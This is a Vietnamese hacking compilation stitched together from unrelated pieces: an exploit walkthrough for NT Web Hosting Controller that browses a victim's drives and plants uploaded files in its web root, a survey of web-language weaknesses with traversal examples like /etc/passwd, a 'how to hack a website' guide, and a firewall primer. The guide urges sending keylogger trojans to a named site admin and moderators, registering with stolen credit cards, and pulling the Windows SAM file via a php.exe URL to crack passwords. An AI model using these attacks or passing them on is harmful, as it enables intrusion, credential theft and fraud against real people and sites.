http://www.victim.com/advwebadmin*hoac admin*/stats/statsbrowse.asp?filepath=c:\&Opt=3

( Lệnh này xem ổ đĩa của victim )

www.victim.com/advwebadmin/autosignup/newwebadmin.asp

( Lệnh này tạo một free hosting )

Nếu như 2 lệnh trên cùng thực hiên được thì ta có thể khai thác chúng được rồi đó , he he .

Cách khai thác :

+ Vì tạo được hosting nên ta có thể upload được file vô tư , các bạn hãy chú ý thử xem địa chỉ mà cất các file ta vừa upload lên ở đâu ( bằng cách nhìn vào thanh statup ) .

+ Tiếp theo là ta làm sao chuyển cái file đó vào thư mục chứa trang chủ của nạn nhân , theo mặc định nó sẽ nằm ở đây :

C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\

( Các bạn có thể thay ổ C:\ bằng D:\ , E:\ )

+ Khi xác định được chính xác địa chỉ rùi ta sẽ tìm đoạn script để làm giúp :

http://[targethost]/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\( đường dẫn đến thư mục web victim )&owwwPa th=C:\&oftpPath=C:\( đường dẫn đến thư mục ta vừa upload file )

+ Các bạn có thể test đường dẫn file up lên có chính xác không bằng cách up lên file a.html bất kỳ , giả sử nó được up lên nằm ở C:\Program Files\Advanced Communications\NT Web Hosting Controller\web\admin\a.html ta sẽ test bằng cách đánh đường dẫn ở URL :

www.victim/admin[avdadmin]/a.html

+ Nếu như đúng là chính xác rồi thì chỉ cần up “Đồ nghề” lên là xong.

Điểm yếu của các ngôn ngữ thiết kế Web

Trong thời điểm internet và các giao dịch, tương tác thông qua internet phát triển rầm rộ như hiện nay, hàng loạt các ngôn ngữ và các giao thức giao tiếp, thiết kế trang web cũng ra đời để phục vụ cho những mục đích nhất định. Có thể kể đến nhiều ngôn ngữ đã phổ biến như HTML, DHTML, XML, Java, Perl, PHP, ColdFuson, ASP.. mỗi loại có ưu và nhược điểm riêng.

Xét về tính đơn giản, gọn nhẹ thì HTML vẫn là lựa chọn đầu tiên. Tuy nhiên, nếu trang web của bạn yêu cầu khả năng tương tác cao hơn; liên kết và cập nhật dữ liệu động; thể hiện thông tin, đồ họa phức tạp, thì Java hay PHP là lựa chọn thời thượng. Để phục vụ tốt cho mục đích phát triển trang web cá nhân hay tổ chức, chúng ta sẽ đề cập sơ lược qua cách thức hoạt động của một số ngôn ngữ và chuẩn web thông dụng, đồng thời phân tích những yếu điểm của chúng liên quan đến vấn đề bảo mật nếu có từ đó có thể chọn cho mình một ngôn ngữ thích hợp.

1. HTML (Hyper Text Markup Language) - Ngôn ngữ đánh dấu siêu văn bản

HTML được phát triển từ 1989 và được sử dụng rộng rãi cho đến nay để trình bày các trang web dạng văn bản, hình ảnh, âm thanh và các dạng ảnh động. Các chi tiết kĩ thuật của ngôn ngữ HTML hiện nay được bảo hộ bởi tổ chức W3C (World Wide Web Consortium -

http://www.w3.org)

.

Một trang HTML là một tệp dữ liệu dạng text có phần mở rộng dạng .htm, .html, .html4 - bao gồm tập hợp của những thành phần HTML (HTML element). Những HTML element sẽ được web browser hiểu và hiển thị trên màn hình thông tin tương ứng với element đó. Ở đây chúng ta chỉ phân tích về khía cạnh bảo mật của các HTML element thông dụng.

<form> - Vùng chứa các đối tượng nhập thông tin của người dùng. Các thành phần cho phép người dùng nhập thông tin là khởi đầu của các nguy cơ về bảo mật. Ở các chương trình thiết kế không tốt, nếu thông tin nhận từ người dùng không phù hợp định dạng hoặc không như mong muốn, chúng có thể tạo nên những kết quả khó lường. Ví dụ một trang web trích thông tin của một người dùng khi nhận tên đăng nhập và mật khẩu của người đó, bằng cách cung cấp thông tin đặc biệt đánh lừa hệ thống, người dùng có thể trích thông tin của tất cả các user khác.

<form action> - Thuộc tính Action. Ta dùng thuộc tính này để chỉ định một trình thực thi trên web server cho đối tượng form. Ví dụ: <form action = "/login.cgi"> ... Khi biết được tên chương trình, ta có thể tìm hiểu thêm các thông tin có giá trị về web server, về thư mục hiện hành của chương trình.

<form method> - Phương thức của form, định nghĩa cách thức dùng để gửi thông tin người dùng nhập vào đến web server cho chương trình xử lý. Khi hiểu được cách thức gửi thông tin (POST và GET), hacker có thể theo dõi và bắt các thông tin đựơc gửi trên mạng, thậm chí có thể thay đổi chúng và gửi đi với giá trị khác để tạo ra những kết quả khó lường.

<script language=<variable>>: Biến truyền vào là ngôn ngữ script phía client, chẳng hạn như: javascript, vbscript, XML.. Khi thay đổi loại ngôn ngữ, hacker có thể vượt qua các bộ lọc kiểm tra.

<input> - Edit control để nhập thông tin. Nếu ứng dụng web không xử lý tốt các thông tin nhập vào, hacker có thể lợi dụng nhập vào các giá trị đặc biệt đánh lừa hệ thống và tạo nên những kết quả không mong muốn. Những giá trị username và password dùng trong kĩ thuật SQL Injection là ví dụ điển hình.

<input type=hidden> - Kiểu đối tượng input. Một số trang web dùng đối tượng input với thuộc tính hidden để chứa giá trị định trước như giá mua hàng ở các trang shopping card. Lợi dụng đặc điểm này, hacker có thể thay đổi giá trị này thành giá trị mong muốn và gửi đ?n web server. Ở các trang web buôn bán, nếu không có những xử lý giá trị phía server, hacker có thể mua được những món hàng với giá giảm đáng kể.

<input maxlength=<variable>>: Giá trị maxlength xác định chiều dài của giá trị nhập vào đối tượng input. Hacker có thể thay đổi giá trị maxlength cho phép nhập vào những giá trị hoặc chuỗi rất dài. Nếu chúng không được xử lý thích hợp, chúng có thể gây nên những lỗi như tràn bộ đệm, thậm chí có thể làm hỏng web server.

<input size=<variable>>: Tương tự như giá trị maxlength.

<applet> - Java applet. Thuộc tính này dùng để hiện và chạy thẻ java applet. Java chạy và gửi thông tin thường dưới dạng plain text nên có thể dùng các chương trình theo dõi gói tin để bắt các thông tin này. Java byte-code có thể dịch ngược đ? xem mã nguồn.

<object> Thuộc tính này dùng để thể hiện các đối tượng ActiveX và Java applet. Lợi dụng thuộc tính này, hacker có thể gửi email có nhúng HTML và đánh lừa người dùng chạy các ActiveX control có thể đoạt quyền điều khiển hệ thống. Đây cũng là một trong những cách tốt nhất người ta lợi dụng để lan truyền virus trên mạng.

<embed> Thuộc tính này được dùng phối hợp với thẻ <object> để nhúng các đối tượng ActiveX...

2. DHTML (Dynamic HTML)

DHTML là phiên bản mở rộng của HTML có phần mở rộng dạng .dhtml. Nó giúp tăng cường tính tương tác của các đối tượng điều khiển trong trang HTML tĩnh bằng cách cho phép người ta dùng các script vbscript hoặc javascript điều khiển chúng. Ví dụ một thẻ image để nhúng ảnh vào trang web có thể nhận biết khi nào người dùng di chuyển chuột trên nó bằng cách cài đặt hàm xử lý sự kiện OnMouseOver, khi đó thông qua những xử lý thích hợp sẽ làm đối tượng hình ảnh trở nên sống động hơn. Nhìn chung, bên cạnh những mở rộng như tạo những hiệu ứng MouseOver, chuỗi chữ di chuyển đ?ng, thay đổi màu sắc..., các khía cạnh bảo mật của DHTML tương tự như HTML vì nó dựa trên nền tảng HTML. Tuy nhiên hiện nay các lập trình viên web ít chọn DHTML vì có một số trình duyệt không hỗ trợ tốt cho nó, điển hình như Netscape.

3. XML (Extensible Markup Language) - Ngôn ngữ đánh dấu mở rộng

Ngôn ngữ XML mới phát triển trong thời gian gần đây và có thể sẽ được phổ biến rộng rãi trong tương lai, chẳng hạn như ở các ngôn ngữ .NET. Không giới hạn và định nghĩa sẵn như HTML, XML cho phép người dùng tự đ?nh nghĩa ra các thành phần riêng và mở rộng tuỳ ý. Tệp dữ liệu XML có phần mở rộng dạng .xml.

Bộ phận quan trọng nhất trong ngôn ngữ XML là bảng định nghĩa DTD (Document Type Definitions). DTD dùng để định nghĩa các thẻ mở và đóng của một tệp XML, giúp người xem có một cái nhìn tổng quát về dữ liệu đang lưu trữ.

Ví dụ ta cần định nghĩa cấu trúc dữ liệu Danh Sách Sinh Viên, ta tạo một tệp DTD dssv.dtd như sau:

<!ELEMENT DSSV (SV*)>

<!ELEMENT SV(MASV, TEN, NS, LOP*)>

<!ELEMENT MASV(#PCDATA)>

<!ELEMENT TEN(#PCDATA)>

<!ELEMENT NS(#PCDATA)>

<!ELEMENT LOP(#PCDATA)>

Đây là ví dụ dữ liệu trong tệp XML:

<?xml ?>

<!DOCTYPE DSSV PUBLIC "." "dssv.dtd">

<DSSV>

<SV>

<MASV>95001</MASV>

<TEN>W_Hat</MASV>

<NS>19/11/1077</MASV>

<LOP>TH95</MASV>

</SV>

<SV>

.....

</SV>

</DSSV>

Dữ liệu trên thể hiện thông tin của một sinh viên với mã số, tên, ngày sinh và lớp. Kí hiệu * nằm sau SV và LOP chỉ định dữ liệu có thể chứa nhiều sinh viên, mỗi sinh viên có thể có nhiều lớp.

4. Perl (Pratical Extraction and Report Language)

Perl là ngôn ngữ lập trình cấp cao được phát triển từ năm 1987. Rất mạnh, tiện dụng và đồng thời là ngôn ngữ được phổ biến miễn phí, hỗ trợ cho hầu hết các hệ thống từ Winđowsx/NT/2k/XP, các phiên bản biến thể của Unix đến hệ thống AS/400, MacOS, Novell NetwarePerl...Perl đã và đang được sử dụng rộng rãi hiện nay trên internet.

Perl được dùng chủ yếu cho các xử lý phía server, tuy nhiên ta cũng có thể dùng perl để viết các ứng dụng client, thậm chí có thể tạo nên ứng dụng chạy độc lập để thực hiện một tác vụ tính toán nào đó.

Trên web server, perl thường được thực thi với CGI tạo nên cơ chế xuất thông tin ra trình duyệt web. Hãy xem ví dụ dùng perl để xử lý các thông tin nhập vào từ người dùng trong đoạn html dưới đây:

<form method=POST></form>

<html>

Username:

<input size=80 maxlength=80>

Password:

<input size=80 maxlength=80>

<input type=submit>

</html>

Sau khi người dùng nhập tên, mật khẩu và nhấn nút Login những thông tin này sẽ được gửi đến chương trình perl có tên login.pl nằm ở thư mục /admin/ trên web server. Chương trình login.pl sau khi xử lý sẽ gửi kết quả ngược về web client.

Khi sử dụng perl để thực hiện các xử lý phía server, ta cần lưu ý một số điểm quan trọng sau có khả năng gây nên những nguy cơ về bảo mật nghiêm trọng:

a -

Tránh thực thi các web server dưới quyền quản trị (root trong Unix và adminitrator trong Windows). Khi các script ở web server được chạy có quyền quản trị sẽ rất nguy hiểm nếu ai đó dùng nó để thực hiện các lệnh điều khiển hệ thống. Các bạn có thể thấy script cgi-telnet là một ví dụ cụ thể.

b -

Luôn thực hiện tiền xử lý các thông tin người dùng nhập vào, như các giá trị tên người dùng, mật khẩu, giá cả...Tạo một chuỗi các kí tự hợp lệ tương ứng với thông tin cần nhập và lọc ra những kí tự được nhập không chính xác. Chẳng hạn với tên và mật khẩu người dùng, ta có thể giới hạn ở các kí tự hợp lệ sau: "0..9", "a..z", "A..Z"; không cho phép hoặc lọc bỏ các kí tự đ?c biệt như: "/\+)({}[]'-_=.|" ... Một ví dụ khác về việc dùng perl thực hiện tiền xử lý với email người dùng, với yêu cầu email phải có kí hiệu @ và dấu chấm "." ở ít nhất là phần sau dấu @:

if ($email !~ /^[\w-]+\@[\w.-]+$/)

{

print "<br>#Error in your email. Please re-enter<br>";

}else

{

# thực hiện xử lý đối với thông tin email hợp lệ;

}

c -

Hạn chế không cho phép thực thi các lệnh hệ thống (shell command) như open(), fork(), system(), exec() hoặc cho thực hiện sau khi đã kiểm tra chặt chẽ các tham số truyền vào. Ở các hệ thống bảo vệ lỏng lẻo, hacker có thể lợi dụng truyền các tham số không thích hợp vào các hàm trên để thực hiện các lệnh xem thông tin và điều khiển hệ thống.

d -

Trên các hệ thống Unix, cần thiết lập các thông số $PATH và $IFS bằng các giá trị chính xác cụ thể, tránh dùng các biến môi trường.

Ví dụ ta đặt như sau:

$ENV{"PATH"}="/bin:/usr/bin:/opt";

$ENV{"IFS"}="/";

Việc chỉ định không rõ ràng các thông tin trên có thể tạo điều kiện cho hacker sửa đổi chúng và bắt các chương trình của chúng ta phải thực thi một chương trình nguy hiểm nào đó ở nơi khác thay vì tại vị trí ta mong muốn.

e -

Kiểm tra kích thước và chiều dài của các thông tin người dùng nhập vào hoặc dùng biến $ENV{CONTENT_LENGTH} để hạn chế chiều dài của chuỗi dữ liệu cho các yêu cầu GET/POST. Nếu không được kiểm tra chính xác, hacker có thể gửi đi một lượng dữ liệu có giá trị rất lớn hoặc rất dài có thể gây nên các lỗi tràn bộ đệm, hỏng web server và thậm chí tìm được các điều kiện phát sinh lỗi tràn bộ đệm và thực thi các lệnh nguy hiểm từ xa.

f -

Tránh cho phép chỉ định đường dẫn cụ thể ở các trường dữ liệu hoặc ở các tham số truyền vào các chương trình. Chỉ nên cho phép các đường dẫn mang tính tương đối, cắt bỏ các giá trị có dạng dot dot ".." hoặc slash "/\". Ở rất nhiều chương trình web không kiểm tra đúng đã cho phép người dùng nhập các tham số ví dụ như /../../../../etc/passwd (Unix) hoặc /../../../winnt/repair/sam._ (NT/2k) và dễ dàng lấy được các thông tin về mật khẩu.

g -

Sử dụng khả năng taint checking của perl để theo dõi và kiểm tra giá trị của các biến.

h -

Các chương trình perl được lưu trữ dưới dạng text đơn giản do đó có thể dễ dàng bị xem mã nguồn và lấy các thông tin có giá trị khác tên, mật khẩu truy cập cơ sở dữ liệu...nếu hacker đoạt được quyền điều khiển hệ thống hoặc có quyền xem hệ thống file. Ta có thể dùng một số chương trình ví dụ như perl2exe cho phép chuyển đổi các tệp perl dạng text sang dạng chương trình thực thi .exe, như vậy có thể tránh được việc bị xem mã nguồn và không còn cần trình thông dịch perl khi chạy.

5. PHP (Personal Home Page)

Được phát triển từ năm 1995 và dần được bổ sung qua một số phiên bản, cho đến nay PHP trở thành một trong những ngôn ngữ script phía server phổ biến nhất bên cạnh Perl và ASP (Active Server Pages). Tương tự như Perl, PHP có dạng cú pháp, câu lệnh đơn giản, dễ hiểu - đặc biệt thích hợp với các lập trình viên có hiểu biết về ngôn ngữ C/C++ - đồng thời có ưu điểm là thực thi rất nhanh và có thể chạy ở máy client hoặc như một ứng dụng độc lập. Hiện nay người ta thường dùng PHP đ? thực hiện các tác vụ xử lý phía server ở các web server trên nền Unix, điển hình như Apache. Các chương trình PHP thường có phần mở rộng là .php, .php3, .php4; mã PHP cũng có thể nhúng vào một trang HTML. Hãy xem ví dụ sau thực hiện in lên trình duyệt một chuỗi kí tự:

<!-- PHP Example in HTML

<html>

<?php

echo "<br>Hello World!<br>";

?>

</html>

Chú ý thẻ <? và ?> dùng để đánh dấu nơi bắt đầu và kết thúc mã PHP.

Cho đến nay, những điểm yếu của PHP được phát hiện tương tự như ở ngôn ngữ Perl. Đặc biệt khi sử dụng PHP để nhận các thông tin nhập từ người dùng thông qua trình duyệt và xử lý cơ sở dữ liệu bên dưới; hoặc thực thi các lệnh hệ thống như system(), shellexec(), exec(), passthru()...ta cần chú ý thực hiện việc kiểm tra và lọc những dữ liệu truyền vào không hợp lệ để tránh trường hợp người dùng nhập dữ liệu sai, đánh lừa hệ thống sinh ra những kết quả không mong muốn, thậm chí thực thi các lệnh từ xa.

Ví dụ sau thực hiện việc kiểm tra đơn giản trên chuỗi $value có kiểu số, dùng hàm đ?nh nghĩa sẵn preg_match():

if (preg_match("/^[0-9]+$/i", $value))

echo "Invalid number!

";

return 1;

break;

Các bạn tham khảo thêm các thông tin về PHP tại

http://www.php.net

6. ColdFusion

ColdFusion (CF) là hệ thống phát triển ứng dụng web của công ty Allaire (http://www.allaire.com) với phiên bản mới nhất hiện nay là 5.0. CF có 3 thành phần chính bao gồm: Application Server, Markup Language và Studio. Chúng ta sẽ tìm hiểu sơ lược qua từng thành phần này.

Application Server (Máy chủ ứng dụng) - Đây là thành phần chính của ColdFusion có thể chạy trên các nền Windows và Unix. Application Server chạy trên web server và xử lý các yêu cầu từ các trang mã ColdFusion.

Markup Languge (CFML) - Là ngôn ngữ web phía server được phát triển tuân theo quy ước HTML bao gồm các thẻ và thuộc tính của thẻ. CFML được dùng kết hợp với Application Server tạo nên các các ứng dụng web như các shopping card, quản lý tài khoản ngân hàng trực tuyến...Chương trình ColdFusion có phần mở rộng bắt buộc là .CFM.

Tương tự như Perl và PHP, các tệp CFM được lưu trữ ngầm định dưới dạng text đơn giản do đó chúng có thể dễ dàng bị xem mã nguồn dẫn đến lộ những thông tin quan trọng. Về mặt cấu trúc CFM giống như HTML ở chổ dùng các thẻ tag để thực hiện hầu hết các tác vụ chẳng hạn như kết nối cơ sở dữ liệu, hỗ trợ POP (Post Office Protocol) và SMTP (Simple Mail Transfer Protocol), COM (Component Object Model). Ngoài ra, có rất nhiều third-party add-ons được viết ra để tăng cường các tính năng của ColdFusion, tuy nhiên chúng thường không được cung cấp miễn phí.

Ví dụ sau dùng CFM để mô tả một câu lệnh rút trích dữ liệu:

<CFQUERY>

SELECT MaSV, NameSV, BD

FROM DSSV WHERE MaSV = #URL.MaSV#

</CFQUERY>

Thuộc tính DATASOURCE của thẻ <CFQUERY> xác định một ODBC data source (nguồn dữ liệu). Thuộc tính NAME được dùng sau này khi cần trình bày kết quả lên browser.

Khi thực hiện trên browser, URL có dạng như sau:

http://www.anysite.com/cfm/getdata.cfm?MaSV=TH001

Như vậy, nếu các tham số truyền vào không được kiểm tra và lọc tốt, người dùng có thể truyền vào các giá trị không chuẩn làm thay đổi điều kiện của câu lệnh SELECT, dẫn đến việc họ có thể lấy được toàn bộ dữ liệu của các sinh viên khác.

Để trình bày kết quả của câu lệnh SELECT trên, hãy tham đoạn mã sau:

<HEAD>Thong Tin Sinh Vien</HEAD>

<CFOUTPUT>

<LI>#NameSV#, #BD#, (#MaSV#)</LI><BR>

</CFOUTPUT>

Studio - Cung cấp một môi trường cho người dùng phát triển các ứng dụng web.

Cho đến nay, có 2 vấn đề bảo mật thường gặp với CFM là việc lọc không tốt các tham số truyền vào và cung cấp sẵn nhiều script ví dụ (như openfile.cfm, exprcalc.cfm) mà hacker có thể lợi dụng để dùng cho mục đích của mình như upload file, xem nội dung file, điều khiển các dịch vụ web hoặc thậm chí thực thi các lệnh nguy hiểm khác.

Giải pháp đơn giản để giảm nguy cơ bị tấn công là xóa bỏ các script cung cấp sẵn không cần thiết hoặc cập nhật các bản sửa lỗi cho các script và lọc kĩ các giá trị truyền vào.

7. ASP (Active Server Pages)

ASP là môi trường ngôn ngữ script phía server của Microsoft phát triển chủ yếu phục vụ cho các web server IIS (Internet Information Server). ASP có thể được dùng kết hợp với HTML, mã script và các thành phần ActiveX phía server tạo nên các trang thông tin có nội dung động; thực thi các lệnh hệ thống, kết nối cơ sở dữ liệu, COM...

Ngôn ngữ ngầm định dùng cho ASP là VBScript, đây là phiên bản script của ngôn ngữ Visual Basic quen thuộc. Tương tự một số ngôn ngữ script khác, có 2 dạng VBScript dùng cho ASP. Với script phía server, ta đặt mã lệnh trong thẻ <%@ và %>; phía client, ta dùng thẻ HTML <script>

Làm sao để Hack một trang web

Đây không còn là chuyện bạn đi kiếm trang web bị dính một lỗi để Hack nữa, bây giờ nó là chuyện khác, khi Hack vào một trang web bạn nhằm vào trước, có thể bạn sẽ tốn 1 giờ, một ngày hay vài tháng, không thể nào nói trước được. Và nên nhớ Hack là một nghệ thuật, phải biết dùng cái đầu hơn là dùng đôi tay.

1/

Tìm thông tin về trang Web đó :

Đây gọi là bước FootPrinting tức là thu thập thông tin của mục tiêu. Bạn dùng lệnh Whois để tìm thông tin về tên miền đó, nếu là người đàng hoành thì chắc chắn họ sẽ “khai báo” đầy đủ thông tin của mình, Ví dụ khi thử whois thằng

http://k.domaindlx.com/clairsang/www.ttvnonline.com/default.htm

thì bạn sẽ nhận được gì : Vũ Vương Thắng + đầy đủ thông tin của trang này (mail + địa chỉ nhà …), bạn còn chần chờ gì mà không gửi ngay cho nó một con Trojan keyloger, nhưng dễ hiểu quá, tôi khuyên bạn nên tự viết một con Trojan cho riêng mình, chứ không nên xài đồ có sẵn, như thế Victim sẽ dễ dàng phát hiện được Trojan mà bạn cài và dễ dàng xoá bỏ. Nhưng đôi khi gặp vài trang “Cà chớn” giống như

http://k.domaindlx.com/clairsang/www.vnlogic.net/default.htm

thì tên khai toàn fuck u không L

2/

Trong khi chờ đợi con keyloger của bạn làm việc, có thể nó gửi thông tin của Vũ Vương Thắng về hay đã bị die, bạn bắt tay vào việc quét server, trong phần trước bạn đã có thông tin về host của trang Web mình cần hack. Đầu tiên là quét cổng, quét xem server nó mở cổng nào, nếu may mắn bạn sẽ phát hiện thằng này đã bị ai hack rồi và một chú trojan đang mở rộng cửa đón bạn vào, nhưng nếu không có cũng chẳng sao cả, bạn sẽ phát hiện được thằng server chạy những cổng nào, từ đ1o phát hiện ra nó đang chạy những service nào. Một số server bạn có thể dùng như sau :

http://k.domaindlx.com/clairsang/www.vnn.vn/cgi-bin/test-cgi/_2a@_2a

, mỗi dịch vụ của server sẽ bay ra như moi goi J

3/

Mỗi service đều có một vài lỗi riêng và chưa chắc thằng Admin nó fix hết, bạn đã biết server nó chạy những service nào rồi ở bước trên, bạn còn chần chờ gì nữa mà không thử hết lỗi của từng service (exploit, password defaut …), nếu dùng lỗi do chính bạn páht hiện và chưa công bố lên mạng nữa thì càng tuyệt, càng dễ thành công. Vào bước này tôi khuyên bạn không nên dùng chương trình quét lỗi, nó sẽ quét từ những lỗi từ thời Napoleon I đến giờ, và với tốc độ chậm rì ở VN, cái cơ bản dai ra nhu co co và chưa chắc thành công

4/

Sau mỗi lúc nó dùng remote exploit của bạn không thành công, server vẫn là một bức tường thật vững chắc không thể nào vượt qua được, bạn hãy nghĩ ngay đến việc làm sao kiếm cho được một accout trong server đó đã (để dùng local exploit). Bạn bắt đầu tìm hiểu về cơ cấu tổ chức của trang web. Ví dụ khi Hack

http://k.domaindlx.com/clairsang/www.ttvnonline.com,/default.htm

tôi gửi trojan đến cho Vũ Vương Thắng (Admin của TTVN Online), nhưng đều đã bị phát hiện, tôi nghĩ ngay đến chuyện gửi trojan cho những tên cấp thấp hơn, Ví dụ như trong trang

http://k.domaindlx.com/clairsang/www.ttvnonline.com/default.htm

, ngoài Vũ Vương Thắng, nó còn giao pass FTP cho một số Moderator nữa, thế là bạn gửi cho tất cả cho Moderatorerator và đợi, trong trường hợp này tỷ lệ thành công dễ hơn nhiều bước 1, vì trong đống Moderator chắc cũng có thằng bất cẩn. Hay Ví dụ khi bạn tấn công server của một côn ty, sau khi gửi trojan cho admin mà không dính, bạn có thể gửi trojan cho tay giám đốc kinh doanh nào đó chẳng hạn, chuyên ngành của nó là kinh doanh và nó sẽ không có nhiều đề phòng, cho dù nó yên tâm là nó đã có cài chương trình antivirus, như khi đã nói trong bài Trojan, chương trình antivirus chức năng chính của nó là chống virus, còn những con trojan bị phát hiện chỉ là những con trojan đã nổi tiếng lắm lắm. Ngoài việc dùng keyloger, bạn cũng có thể tự thử tài đoán password của mình. Thường thì những người không giỏi về vi tính thì đặt password có liên quan đến những thông tin của mình (Ví dụ tên vợ con, tên mình, kênh TV ưa thícch …), bước này cũng khá quan trọng và bạn hãy coi phim “Cá Kiếm“ để học tập sư phụ . Vẫn không thành công L, nếu thằng đó dùng share host thì việc kiếm được một cái account khoẻ re, dùng ngay cái credit card do bạn chôm được từ trường đăng ký ngay một cái accout, và thằng reseller cha dại mà từ chối tặng bạn account để xài đâu. Có account trong server đó rồi rất tiện, bạn thử dùng Local exploit để đoạt quyền root, thường thì mấy thằng admin không fix Local exploit, nó chỉ quan tâm từ bên ngoài thôi, còn chuyện nội bộ nó không quan tâm lắm. Bây giờ giống như bước 3, thử tất cả các lỗi Local mà bạn biết để thử đoạt quyền root.

5/

Nếu Website mà bạn muốn Hack bị lỗi PHP thì đầu tiên bạn hãy vào Start --> programs --> MS-DOS Prompt và gõ lệnh : Ping

http://k.domaindlx.com/clairsang/www.t_25c3_25aantrangweb.com/default.htm

và Enter để biết được IP của Website đó. Sau đó bạn gõ :

http://IP Website/php/php.exe?c:\winnt\repair\sam

Nó sẽ Download file *.SAM về cho bạn. Đó là file chứa Password tuy nhiên đã được mã hoá. Bạn hãy dùng chương trình L0phtCrack (Download trong mục Hack Tools) để giải mã nó

Thế là xong

Tìm hiểu về tường lửa (firewall)

Tường lửa là gì?

Một cách vắn tắt, tường lửa (firewall) là hệ thống ngăn chặn việc truy nhập trái phép từ bên ngoài vào mạng. Tường lửa thực hiện việc lọc bỏ những địa chỉ không hợp lệ dựa theo các quy tắc hay chỉ tiêu định trước.

Tường lửa có thể là hệ thống phần cứng, phần mềm hoặc kết hợp cả hai. Nếu là phần cứng, nó chỉ bao gồm duy nhất bộ định tuyến (router). Bộ định tuyến có các tính năng bảo mật cao cấp, trong đó có khả năng kiểm soát địa chỉ IP (IP Address ố là sơ đồ địa chỉ hoá để định nghĩa các trạm (host) trong liên mạng). Quy trình kiểm soát cho phép bạn định ra những địa chỉ IP có thể kết nối với mạng của bạn và ngược lại. Tính chất chung của các tường lửa là phân biệt địa chỉ IP hay từ chối việc truy nhập không hợp pháp căn cứ trên địa chỉ nguồn.

Các dạng tường lửa

Mỗi dạng tường lửa khác nhau có những thuận lợi và hạn chế riêng. Dạng phổ biến nhất là tường lửa mức mạng (Network-level firewall).

Loại tường lửa này thường dựa trên bộ định tuyến, vì vậy các quy tắc quy định tính hợp pháp cho việc truy nhập được thiết lập ngay trên bộ định tuyến. Mô hình tường lửa này sử dụng kỹ thuật lọc gói tin (packet-filtering technique) ố đó là tiến trình kiểm soát các gói tin qua bộ định tuyến.

Khi hoạt động, tường lửa sẽ dựa trên bộ định tuyến mà kiểm tra địa chỉ nguồn (source address) hay địa chỉ xuất phát của gói tin. Sau khi nhận diện xong, mỗi địa chỉ nguồn IP sẽ được kiểm tra theo các quy tắc do người quản trị mạng định trước.

Tường lửa dựa trên bộ định tuyến làm việc rất nhanh do nó chỉ kiểm tra lướt trên các địa chỉ nguồn mà không hề có yêu cầu thực sự nào đối với bộ định tuyến, không tốn thời gian xử lý những địa chỉ sai hay không hợp lệ. Tuy nhiên, bạn phải trả giá: ngoại trừ những điều khiển chống truy nhập, các gói tin mang địa chỉ giả mạo vẫn có thể thâm nhập ở một mức nào đó trên máy chủ của bạn.

Một số kỹ thuật lọc gói tin có thể được sử dụng kết hợp với tường lửa để khắc phục nhược điểm nói trên. Địa chỉ IP không phải là thành phần duy nhất của gói tin có thể mắc bẫy bộ định tuyến. Người quản trị nên áp dụng đồng thời các quy tắc, sử dụng thông tin định danh kèm theo gói tin như thời gian, giao thức, cổng... để tăng cường điều kiện lọc. Tuy nhiên, sự yếu kém trong kỹ thuật lọc gói tin của tường lửa dựa trên bộ định tuyến không chỉ có vậy.

Một số dịch vụ gọi thủ tục từ xa (Remote Procedure Call - RPC) rất khó lọc một cách hiệu quả do các server liên kết phụ thuộc vào các cổng được gán ngẫu nhiên khi khởi động hệ thống. Dịch vụ gọi là ánh xạ cổng (portmapper) sẽ ánh xạ các lời gọi tới dịch vụ RPC thành số dịch vụ gán sẵn, tuy nhiên, do không có sự tương ứng giữa số dịch vụ với bộ định tuyến lọc gói tin, nên bộ định tuyến không nhận biết được dịch vụ nào dùng cổng nào, vì thế nó không thể ngăn chặn hoàn toàn các dịch vụ này, trừ khi bộ định tuyến ngăn toàn bộ các gói tin UDP (các dịch vụ RPC chủ yếu sử dụng giao thức UDP ố User Datagram Protocol). Việc ngăn chặn tất cả các gói tin UDP cũng sẽ ngăn luôn cả các dịch vụ cần thiết, ví dụ như DNS (Domain Name Service ố dịch vụ đặt tên vùng). Vì thế, dẫn đến tình trạng tiến thoái lưỡng nan.

Tường lửa dựa trên ứng dụng/cửa khẩu ứng dụng

Một dạng phổ biến khác là tường lửa dựa trên ứng dụng (application-proxy). Loại này hoạt động hơi khác với tường lửa dựa trên bộ định tuyến lọc gói tin. Cửa khẩu ứng dụng (application gateway) dựa trên cơ sở phần mềm. Khi một người dùng không xác định kết nối từ xa vào mạng chạy cửa khẩu ứng dụng, cửa khẩu sẽ ngăn chặn kết nối từ xa này. Thay vì nối thông, cửa khẩu sẽ kiểm tra các thành phần của kết nối theo những quy tắc định trước. Nếu thoả mãn các quy tắc, cửa khẩu sẽ tạo cầu nối (bridge) giữa trạm nguồn và trạm đích.

Cầu nối đóng vai trò trung gian giữa hai giao thức. Ví dụ, trong một mô hình cửa khẩu đặc trưng, gói tin theo giao thức IP không được chuyển tiếp tới mạng cục bộ, lúc đó sẽ hình thành quá trình dịch mà cửa khẩu đóng vai trò bộ phiên dịch.

Ưu điểm của tường lửa cửa khẩu ứng dụng là không phải chuyển tiếp IP. Quan trọng hơn, các điều khiển thực hiện ngay trên kết nối. Sau cùng, mỗi công cụ đều cung cấp những tính năng thuận tiện cho việc truy nhập mạng. Do sự lưu chuyển của các gói tin đều được chấp nhận, xem xét, dịch và chuyển lại nên tường lửa loại này bị hạn chế về tốc độ. Quá trình chuyển tiếp IP diễn ra khi một server nhận được tín hiệu từ bên ngoài yêu cầu chuyển tiếp thông tin theo định dạng IP vào mạng nội bộ. Việc cho phép chuyển tiếp IP là lỗi không tránh khỏi, khi đó, cracker (kẻ bẻ khoá) có thể thâm nhập vào trạm làm việc trên mạng của bạn.

Hạn chế khác của mô hình tường lửa này là mỗi ứng dụng bảo mật (proxy application) phải được tạo ra cho từng dịch vụ mạng. Như vậy một ứng dụng dùng cho Telnet, ứng dụng khác dùng cho HTTP, v.v..

Do không thông qua quá trình chuyển dịch IP nên gói tin IP từ địa chỉ không xác định sẽ không thể tới máy tính trong mạng của bạn, do đó hệ thống cửa khẩu ứng dụng có độ bảo mật cao hơn.

Các ý niệm chung về tường lửa

Một trong những ý tưởng chính của tường lửa là che chắn cho mạng của bạn khỏi tầm nhìn của những người dùng bên ngoài không được phép kết nối, hay chí ít cũng không cho phép họ rớ tới mạng. Quá trình này thực thi các chỉ tiêu lọc bỏ do người quản trị ấn định.

